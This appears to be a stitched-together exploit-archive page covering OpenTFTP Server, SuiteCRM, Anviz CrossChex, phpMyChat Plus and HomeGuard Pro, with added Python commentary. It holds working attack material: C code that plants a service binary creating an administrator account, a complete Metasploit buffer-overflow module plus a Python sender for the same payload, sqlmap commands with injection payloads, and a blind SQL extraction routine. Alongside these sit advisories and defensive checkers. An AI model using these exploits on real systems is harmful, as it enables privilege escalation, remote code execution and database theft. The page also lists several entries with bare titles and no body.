C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)

## Local Privilege Escalation Proof of Concept
#0. Download & install Open TFTP Server v1.66

#1. Create low privileged user & change to the user
C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
User name lowPrivUser
Local Group Memberships *Users
Global Group memberships *None
C:\>whoami
mycomputer\lowprivuser

#2. Move the Service EXE to a new name
C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe
1 file(s) moved.

#3. Create malicious binary on kali linux
1) Download dependencies
root@kali# apt install gcc-mingw-w64-i686 wine64 -y
2) Add Admin User C Code
root@kali# cat addAdmin.c
#include <windows.h>
int main(void){
    /* runs as LocalSystem when the service starts: create a user and make it an admin */
    system("net user hacker mypassword /add");
    system("net localgroup Administrators hacker /add");
    /* then start the renamed original binary so the TFTP service still comes up */
    WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0);
    return 0;
}
3) Compile Code
root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe

#4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host

#5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder
C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\
1 file(s) moved.
C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe"
02/12/2020 05:59 PM 288,659 OpenTFTPServerSP.exe
02/12/2020 06:38 PM 221,560 ~OpenTFTPServerSP.exe

#6. Reboot the Computer

#7. Look at that new Admin
C:\Users\lowPrivUser>net users hacker | findstr "Local name active"
User name hacker
Account active Yes
Local Group Memberships *Administrators *Users

C:\Users\lowPrivUser>net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
boku
hacker

SuiteCRM 7.11.11 Broken Access Control / Local File Inclusion


SuiteCRM versions 7.11.11 and below suffer from an add_to_prospect_list broken access control that allows for local file inclusion attacks.


MD5 | 30243acc735a0a74cd60961a8b809988

------------------------------------------------------------------------------
SuiteCRM <= 7.11.11 (add_to_prospect_list) Broken Access Control
Vulnerability
------------------------------------------------------------------------------


[-] Software Link:

https://suitecrm.com/


[-] Affected Versions:

Version 7.11.11 and prior versions.


[-] Vulnerability Description:

There is a Local File Inclusion vulnerability within the "add_to_prospect_list" function. User input passed through the "parent_module" and "parent_type" parameters is not properly validated before being used in a call to the include() function. This can be exploited to include arbitrary .php files within the webroot and potentially bypass authorization mechanisms (for instance, by setting the "parent_module" parameter to "Administration" and the "parent_type" parameter to "expandDatabase" or any other administrative action which does not implement ACL checks).
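The vulnerable pattern is a file path assembled from two request parameters and handed to include(). What follows is an added example written for this page, not SuiteCRM code, of the checks a patched dispatcher should apply, in Python so it runs stand-alone: the modules directory layout, the allow-list contents and the function names are assumptions, not SuiteCRM's own. The point of the allow-list is that a syntactically clean pair such as Administration/expandDatabase is still refused, because the bug is an authorization gap, not only path traversal.

```python
import os
import re

# Assumed layout (hypothetical; not SuiteCRM's actual dispatcher): the handler turns two
# request parameters into "modules/<parent_module>/<parent_type>.php" and include()s it.
WEBROOT = "/var/www/suitecrm"
MODULES_DIR = os.path.join(WEBROOT, "modules")

# Plain identifiers only: no separators, dots or NUL bytes can reach the path.
_IDENT = re.compile(r"^[A-Za-z][A-Za-z0-9_]{0,63}$")

# The (module, action) pairs add_to_prospect_list legitimately needs (assumed list).
# Anything not listed, "Administration"/"expandDatabase" included, is refused no
# matter how clean the resulting path looks.
ALLOWED = {
    ("Contacts", "addtoprospectlist"),
    ("Leads", "addtoprospectlist"),
    ("Prospects", "addtoprospectlist"),
}


def include_target_unsafe(parent_module, parent_type):
    """The vulnerable shape: request values go straight into the include path."""
    return os.path.join(MODULES_DIR, parent_module, parent_type + ".php")


def vet_include(parent_module, parent_type):
    """Return (path, None) when the include is permitted, otherwise (None, reason)."""
    if not (_IDENT.match(parent_module) and _IDENT.match(parent_type)):
        return None, "invalid name"
    if (parent_module, parent_type) not in ALLOWED:
        return None, "not permitted for this function"
    path = os.path.realpath(os.path.join(MODULES_DIR, parent_module, parent_type + ".php"))
    # Containment check is defence in depth: the identifier regex already rules traversal out.
    if not path.startswith(os.path.realpath(MODULES_DIR) + os.sep):
        return None, "path escapes modules directory"
    return path, None
```

The three checks are deliberately ordered: syntax first (cheap, kills traversal and NUL tricks), then the per-function allow-list (the actual fix for this advisory), then realpath containment as a safety net in case the allow-list is later relaxed to a prefix match.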


[-] Solution:

No official solution is currently available.


[-] Disclosure Timeline:

[19/09/2019] - Vendor notified
[20/09/2019] - Vendor acknowledgement
[12/11/2019] - Vendor contacted again asking for updates, no response
[20/01/2020] - Vendor notified about public disclosure intention, no response
[07/02/2020] - CVE number assigned
[12/02/2020] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2020-8803 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2020-04




SuiteCRM 7.11.10 SQL Injection


SuiteCRM versions 7.11.10 and below suffer from multiple remote SQL injection vulnerabilities.


MD5 | e563a245d3450a08dc89409be7d351e6

----------------------------------------------------------
SuiteCRM <= 7.11.10 Multiple SQL Injection Vulnerabilities
----------------------------------------------------------


[-] Software Link:

https://suitecrm.com/


[-] Affected Versions:

Version 7.11.10 and prior versions.


[-] Vulnerabilities Description:

1) The vulnerability is located within the SOAP API, specifically in the set_entries() SOAP function. User input passed through the "name_value_lists" parameter (specifically the "first_name" and "last_name" elements) isn't properly sanitized before being used to construct a SQL query within the check_for_duplicate_contacts() function. This can be exploited by malicious users to e.g. read sensitive data from the database through in-band SQL injection attacks.

2) The vulnerability is located within the EmailUIAjax interface. User input passed through the "bean_module" and "bean_id" parameters when handling the "addContact" action isn't properly sanitized before being used to construct a SQL query. This can be exploited by malicious users to read sensitive data from the database through boolean-based SQL injection attacks.

3) The vulnerability is located within the EmailUIAjax interface. User input passed through the "contactData" parameter when handling the "addContactsMultiple" action isn't properly sanitized before being used to construct a SQL query. This can be exploited by malicious users to read sensitive data from the database through boolean-based SQL injection attacks.

4) The vulnerability is located within the EmailUIAjax interface. User input passed through the "ids" parameter when handling the "removeContact" action isn't properly sanitized before being used to construct a SQL query. This can be exploited by malicious users to read sensitive data from the database through time-based SQL injection attacks.

5) The vulnerability is located within the MailMerge module. User input passed through the "rel_module" parameter when handling the "search" action isn't properly sanitized before being used to construct a SQL query. This can be exploited by malicious users to read sensitive data from the database through time-based SQL injection attacks.


[-] Solution:

Upgrade to version 7.11.11 or later.


[-] Disclosure Timeline:

[19/09/2019] - Vendor notified
[20/09/2019] - Vendor acknowledgement
[12/11/2019] - Vendor contacted again asking for updates, no response
[20/01/2020] - Vendor notified about public disclosure intention, no response
[07/02/2020] - CVE number assigned
[10/02/2020] - Version 7.11.11 released
[12/02/2020] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2020-8804 to these vulnerabilities.


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2020-05




macOS / iOS launchd XPC Message Parsing Memory Corruption


launchd on macOS and iOS suffers from a memory corruption issue due to a lack of bounds checking when parsing XPC messages.


MD5 | 1214e0a3adca8432caea6990153f7571


XPC Memory Disclosure / Corruption


XPC fast path fails to ensure NULL termination of XPC strings, leading to memory disclosure and corruption vulnerabilities in XPC services.


MD5 | 0f1657d7f62dc322829fee09424c0e5c


Samsung /dev/tsmux Heap Out-Of-Bounds Write


Anviz CrossChex Buffer Overflow


This Metasploit module waits for broadcasts from Anviz CrossChex looking for new devices and returns a custom broadcast that triggers a stack buffer overflow.


MD5 | e3ba89a23a55784d1a94210335d0e24f

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  PACKET_LEN = 10

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Anviz CrossChex Buffer Overflow',
      'Description' => %q{
        Waits for broadcasts from Anviz CrossChex looking for new devices, and returns a custom broadcast,
        triggering a stack buffer overflow.
      },
      'Author' =>
        [
          'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit
          'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit
          'agalway-r7', # Module creation
          'adfoster-r7' # Module creation
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2019-12518'],
          ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
          ['EDB', '47734']
        ],
      'Payload' =>
        {
          'Space' => 8947,
          'DisableNops' => true
        },
      'Arch' => ARCH_X86,
      'EncoderType' => Msf::Encoder::Type::Raw,
      'Privileged' => true,
      'Platform' => 'win',
      'DisclosureDate' => '2019-11-28',
      'Targets' =>
        [
          [
            'Crosschex Standard x86 <= V4.3.12',
            {
              'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
              'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
              'Shift' => 4 # Positions payload to be written at beginning of ESP
            }
          ]
        ],
      'DefaultTarget' => 0
    ))
    deregister_udp_options
    register_options(
      [
        Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
        Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
        OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
      ])
  end

  def exploit
    connect_udp

    # Block until CrossChex sends its device-discovery broadcast (or the timeout elapses)
    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
    if res.empty?
      fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
    end

    print_status "CrossChex broadcast received, sending payload in response"
    sploit = rand_text_english(target['Offset'])
    sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
    sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
    sploit << payload.encoded

    udp_sock.sendto(sploit, host, port)
    print_status "Payload sent"
  end
end
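The module's target block encodes the whole exploit layout: 261 bytes of filler to reach the saved return address, the address of a JMP ESP in the CrossChex image, 4 bytes of slack, then the payload. The following is an added Python example written for this page, not the module's or the researchers' code: it builds the same reply and slices it back apart so the offsets can be checked against what a debugger shows, and the plain-socket listener mirrors the module's wait-for-broadcast flow. The constants are copied from the module; the function names are my own.

```python
import socket
import struct

# Constants taken from the module's target definition and option defaults.
OFFSET = 261            # bytes of filler before the saved return address
JMP_ESP = 0x00421807    # "\x07\x18\x42\x00" read as a little-endian dword
SHIFT = 4               # slack between the return address and where ESP points
MAX_PAYLOAD = 8947      # 'Space' from the module's Payload section
DISCOVERY_LEN = 10      # PACKET_LEN: size of the discovery broadcast the module waits for


def build_response(payload, filler=b"A"):
    """Lay out the reply exactly as the module does: filler, JMP ESP address, slack, payload."""
    if len(payload) > MAX_PAYLOAD:
        raise ValueError("payload exceeds the space the module allows")
    return filler * OFFSET + struct.pack("<I", JMP_ESP) + filler * SHIFT + payload


def layout(packet):
    """Slice a packet back into its regions; useful to compare with a debugger view."""
    ret = packet[OFFSET:OFFSET + 4]
    return {
        "eip": struct.unpack("<I", ret)[0],   # value that lands in EIP on return
        "ret_has_nul": b"\x00" in ret,        # does the address contain a NUL byte?
        "payload_offset": OFFSET + 4 + SHIFT, # first payload byte, where ESP points
    }


def reply_to_broadcast(payload, listen_port=5050, timeout=100.0):
    """Same flow as the module: wait for CrossChex's discovery broadcast, answer the sender."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(("0.0.0.0", listen_port))   # 0.0.0.0 is needed to receive broadcasts
        s.settimeout(timeout)
        _, peer = s.recvfrom(DISCOVERY_LEN)
        s.sendto(build_response(payload), peer)
        return peer
```

Two things follow from the constants alone. The return address 0x00421807 has a NUL in its top byte, yet the module still appends the shift bytes and the payload after it, so the overflowed copy must be length-based rather than a C-string copy that would stop at that NUL. And with DisableNops set and a raw encoder type there is no sled, which is why 'Shift' has to place ESP exactly on the payload's first byte.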

HTTP DoS / DDoS Tools User Manual

SWAPGS Attack Proof Of Concept

phpMyChat Plus 1.98 SQL Injection


phpMyChat Plus version 1.98 suffers from a remote SQL injection vulnerability.


MD5 | 9213f3b689c839421d7a82a9fae9f8ba

# Title: phpMyChat Plus 1.98 - 'pmc_username' SQL Injection
# Date: 2020-02-13
# Exploit Author: J3rryBl4nks
# Vendor Homepage: http://ciprianmp.com/latest/
# Software Link: https://sourceforge.net/projects/phpmychat/files/phpMyChat_Plus/
# Version: phpMyChat Plus 1.98
# Tested on: Windows 10/Kali Rolling

# The phpMyChat Plus 1.98 application is vulnerable to SQL injection
# (boolean-based blind, error-based, time-based blind) on the deluser.php page
# through the pmc_username POST parameter.

# POC code:
# Capture the login request to deluser.php with Burp Suite and save it as deleteuserlogin.req:

POST /plus/deluser.php HTTP/1.1
Host: HOSTNAME
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://HOSTNAME/plus/deluser.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Connection: close
Cookie: CookieLang=english; temp=temp; CookieUsername=testing; CookieRoom=Public%2BRoom%2B1; CookieRoomType=1; CookieStatus=r; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9
Upgrade-Insecure-Requests: 1

L=english&Link=&LIMIT=0&pmc_username=test&pmc_password=test&login_form=Log+In


# Then use sqlmap to get the user tables:

sqlmap -r deleteuserlogin.req --level=5 --risk=3 --dbms=mysql --tamper=unmagicquotes -D DBNAME --dump -T c_reg_users -p pmc_username

Parameter: pmc_username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND 9736=(SELECT (CASE WHEN (9736=9736) THEN 9736 ELSE (SELECT 2847 UNION SELECT 9983) END))-- qEHq&pmc_password=test&login_form=Log In

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: L=english&Link=&LIMIT=0&pmc_username=test' OR (SELECT 7708 FROM(SELECT COUNT(*),CONCAT(0x7170627a71,(SELECT (ELT(7708=7708,1))),0x7162627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShDx&pmc_password=test&login_form=Log In

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND (SELECT 5588 FROM (SELECT(SLEEP(5)))wWnk)-- FHPh&pmc_password=test&login_form=Log In
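Both the SuiteCRM set_entries() duplicate check described earlier and this phpMyChat login splice a user-controlled string into a WHERE clause; the sqlmap payloads above are what that looks like from outside. The following is an added example written for this page, not code from either project: it reproduces the pattern against an in-memory SQLite table with constructed rows, runs the boolean-based blind extraction that sqlmap automates, and shows the same injected input failing against the parameterized query. Table and column names and the data are made up; SQLite's unicode() and substr() stand in for MySQL's ORD() and SUBSTRING().

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the application's user table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "s3cret!"), ("testing", "hunter2")])
    return con


def login_vulnerable(con, username, password):
    """The pattern behind both advisories: the value is spliced into the SQL text."""
    sql = (f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return con.execute(sql).fetchone()[0] > 0


def login_safe(con, username, password):
    """Same query with bound parameters; the input can never become SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone()[0] > 0


def oracle(con, condition):
    """One boolean-based blind probe: all the attacker sees is login success or failure."""
    return login_vulnerable(con, f"x' OR ({condition})-- ", "irrelevant")


def extract(con, subquery, maxlen=32):
    """Recover the string a subquery returns, about 7 probes per character (binary search
    over ASCII). This is what sqlmap's boolean-based blind technique automates."""
    result = ""
    for pos in range(1, maxlen + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(con, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:   # past the end: unicode('') is NULL, so every probe is false
            break
        result += chr(lo)
    return result
```

The extraction needs nothing but the true/false answer of the login, which is why "read sensitive data from the database" is the right severity for a blind injection in a login or duplicate-check query even though no rows are ever echoed back.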

HomeGuard Pro 9.3.1 Insecure Folder Permissions


HomeGuard Pro version 9.3.1 suffers from an insecure folder permission vulnerability.


MD5 | a0e51a7e93f68de15cbd46648a358704

# Exploit Title: HomeGuard Pro 9.3.1 - Insecure Folder Permissions
# Exploit Author: boku
# Date: 2020-02-13
# Vendor Homepage: https://veridium.net
# Software Link: https://veridium.net/files_u/hg-pro/exe/HomeGuardPro-Setup.exe
# Version 9.3.1
# Tested On: Windows 10 (32-bit)

# HomeGuard Pro v9.3.1 - Unquoted Service Path + Insecure Folder/File/Service Permissions

## Service Information (Unquoted Service Path)
C:\>wmic service get Name,PathName,StartMode,StartName | findstr /v "C:\Windows" | findstr /i /v """
Name PathName StartMode StartName
HG52 AM VI C:\Program Files\HomeGuard Pro\vglset.exe Auto LocalSystem
HG52 AMC C:\Program Files\HomeGuard Pro\vglsetw.exe Auto LocalSystem
HG52 AM REM C:\Program Files\HomeGuard Pro\vglrem.exe Auto LocalSystem
HG52 AM SRV C:\Program Files\HomeGuard Pro\vglserv.exe Auto LocalSystem

## Insecure Folder Permission
C:\>icacls "C:\Program Files\HomeGuard Pro" | findstr /i "Users"
C:\Program Files\HomeGuard Pro BUILTIN\Users:(F)

## Insecure File/Service Permission
C:\>icacls "C:\Program Files\HomeGuard Pro\VGL*" | findstr /i "Users"
C:\Program Files\HomeGuard Pro\vglrem.exe BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\VGLSERV.EXE BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\vglset.exe BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\vglsetw.exe BUILTIN\Users:(I)(F)
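HomeGuard Pro combines two classic Windows service weaknesses, an unquoted image path containing spaces and a program folder (and the service binaries in it) writable by BUILTIN\Users; the OpenTFTP Server procedure at the top of this page exploits the second kind by dropping a replacement service binary into C:\OpenTFTPServer\ and rebooting. The following is an added example written for this page, not from either advisory: a checker that runs over the output of the two commands used above, lists the paths the service control manager would try before the real image when a path is unquoted, and cross-references icacls write rights against each service's image and directory. The sample input is constructed from the advisory's lines plus one hypothetical, correctly quoted service, and the CSV shape assumes wmic's /format:csv output.

```python
import csv
import io
import re

# Constructed sample input in the shape of
#   wmic service get Name,PathName,StartMode,StartName /format:csv
# using the HomeGuard Pro entries above plus one hypothetical, correctly quoted service.
WMIC_CSV = r'''Node,Name,PathName,StartMode,StartName
WIN10,HG52 AM VI,C:\Program Files\HomeGuard Pro\vglset.exe,Auto,LocalSystem
WIN10,HG52 AM SRV,C:\Program Files\HomeGuard Pro\vglserv.exe,Auto,LocalSystem
WIN10,Good Svc,"""C:\Program Files\Good Vendor\good.exe""",Auto,LocalSystem
'''

# Constructed icacls output in the same shape as the advisory's icacls lines.
ICACLS_OUT = r'''C:\Program Files\HomeGuard Pro BUILTIN\Users:(F)
C:\Program Files\HomeGuard Pro\VGLSERV.EXE BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\vglset.exe BUILTIN\Users:(I)(F)
C:\Program Files\Good Vendor\good.exe BUILTIN\Users:(I)(RX)
'''

LOW_PRIV = r"BUILTIN\\Users|Everyone|NT AUTHORITY\\Authenticated Users"
_ACL_LINE = re.compile(r"^(?P<path>\S.*?)?\s*(?P<who>" + LOW_PRIV + r"):(?P<aces>\S+)\s*$")
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D"}   # full, modify, write, write-data, append, delete


def writable_paths(icacls_text):
    """Lower-cased paths on which a low-privilege principal holds a write-capable right."""
    hits, last = set(), None
    for line in icacls_text.splitlines():
        m = _ACL_LINE.match(line)
        if not m:
            continue
        path = m.group("path") or last   # icacls indents the further ACEs of one path
        last = path
        tokens = {t for grp in re.findall(r"\(([^)]*)\)", m.group("aces")) for t in grp.split(",")}
        if path and tokens & WRITE_RIGHTS:
            hits.add(path.lower())
    return hits


def image_path(pathname):
    """Service image without surrounding quotes or trailing arguments."""
    p = pathname.strip('"')
    end = p.lower().find(".exe")
    return p[:end + 4] if end != -1 else p


def hijack_candidates(pathname):
    """Paths the service control manager tries before the real image when an unquoted
    path contains spaces; whoever can write one of them runs as the service account."""
    if pathname.startswith('"'):
        return []
    exe = image_path(pathname)
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def assess(wmic_csv, icacls_text):
    """One finding per service: unquoted-path candidates plus whether the image or its
    directory is writable by a low-privilege principal (the HomeGuard / OpenTFTP case)."""
    writable = writable_paths(icacls_text)
    findings = []
    for row in csv.DictReader(io.StringIO(wmic_csv)):
        exe = image_path(row["PathName"])
        directory = exe.rsplit("\\", 1)[0]
        findings.append({
            "service": row["Name"],
            "runs_as": row["StartName"],
            "hijack_candidates": hijack_candidates(row["PathName"]),
            "binary_writable": exe.lower() in writable,
            "dir_writable": directory.lower() in writable,
        })
    return findings


if __name__ == "__main__":
    for finding in assess(WMIC_CSV, ICACLS_OUT):
        print(finding)
```

On a real host, feed assess() the unfiltered output of `wmic service get Name,PathName,StartMode,StartName /format:csv` and `icacls "<dir>" /t`: icacls prints the path only on the line carrying the first ACE, so piping through findstr before parsing can drop the path that a later Users ACE belongs to. A finding with runs_as LocalSystem and either a writable image or a hijack candidate in a writable directory is the condition both advisories on this page rely on.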
